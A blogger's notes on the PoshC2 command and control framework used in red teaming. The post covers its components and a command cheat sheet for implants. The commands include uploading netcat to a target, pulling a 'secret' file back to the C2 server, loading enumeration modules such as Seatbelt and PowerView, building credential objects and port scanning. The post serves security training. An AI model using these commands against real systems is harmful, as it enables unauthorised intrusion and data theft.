This is an ongoing post containing my notes on PoshC2 usage.
What is PoshC2?
PoshC2 is a command and control framework. It is used to carry out post-exploitation tasks such as persistence, privilege escalation and lateral movement during penetration testing and red teaming exercises. It supports Python3, PowerShell (v2 and v5), C# and C++. The official documentation is available here.
All of PoshC2 functionality can be divided into five components:
PoshC2 Server – Serves payloads that, when executed on the target machine(s), send a connection back to PoshC2. The server console also displays the output of the command(s) executed on an implant. The server is written in Python.
Implants Receiver – Listens for the incoming implant connections and aggregates them. It is also used to load modules and execute commands on a single, multiple or all implants.
Implants – Target machine(s) connected to PoshC2.
Modules – Scripts (PowerShell and Python) and executable binaries (C#) that help in conducting various post-exploitation tasks such as enumeration, privilege escalation, lateral movement, hash dump, port forwarding etc. A comprehensive list of modules is available here.
How to use?
The following video shows how to get PoshC2 up and running quickly. It covers:
- Installation on Kali Linux 2020.2
- Configuring PoshC2
- Running Posh-server and implants receiver
- Managing implants
- Loading C# and PowerShell modules on an Implant
- Running commands on an implant
Read this to learn more about the lab environment used in this video.
Useful Commands (C# Implants)
- To select a single implant, enter the ImplantID
- To select multiple implants, enter a comma separated list of ImplantIDs
- To select all implants, enter ALL
Quick Reference List of Commands
Issue the following commands when connected to one or more implants.
upload-file <source file path> <destination file path> Example: upload-file /usr/share/windows-binaries/nc.exe C:\Users\Public\nc.exe
download-file <file path> Example: download-file 'C:\\Users\\Public\\supersecretdata.txt'
This will save a copy of the target file in the PoshC2 project directory.
To list implant specific modules, select an implant and issue the following command:
To list all modules, issue the following command at implant selection prompt:
Load a C# Module
loadmodule <module name> Example: loadmodule SharpView.exe
Load a PowerShell Module
pslo <module name> Example: pslo powerview.ps1
You can also use loadmoduleforce to load modules.
Execute a PowerShell Command
sharpps <command> Example: sharpps Get-ChildItem -Force -Recurse
Convert Username and Password to a PSCredentials object
sharpps [string]$userName = 'IND\user.ind02'
sharpps [string]$userPassword = 'Sup3rStr0ngP@ssw0rd'
sharpps [securestring]$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force
sharpps [pscredential]$credObject = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword)
After executing the above commands, $credObject can be passed as the value of the -Credential parameter in PowerShell commands that accept it.
Enumerate an Implant
ls-recurse <directory path> Example: ls-recurse C:\Users
get-userinfo
get-computerinfo
loadmodule Seatbelt.exe
seatbelt all
sharpup
portscan <IP> <port> <delay-in-seconds> <max thread> Example: portscan "192.168.3.8" "1-1000" 1 100
Uday Mittal is a cybersecurity professional with rich working experience across various industries including telecom, publishing, consulting and finance. He holds internationally recognized certifications such as CRTP, OSCE, OSCP, CISSP, CISA, CISM and CRISC, among others. He speaks on cybersecurity awareness and offensive security research, and has authored various articles on topics related to cyber security and software development for a leading magazine on open source software.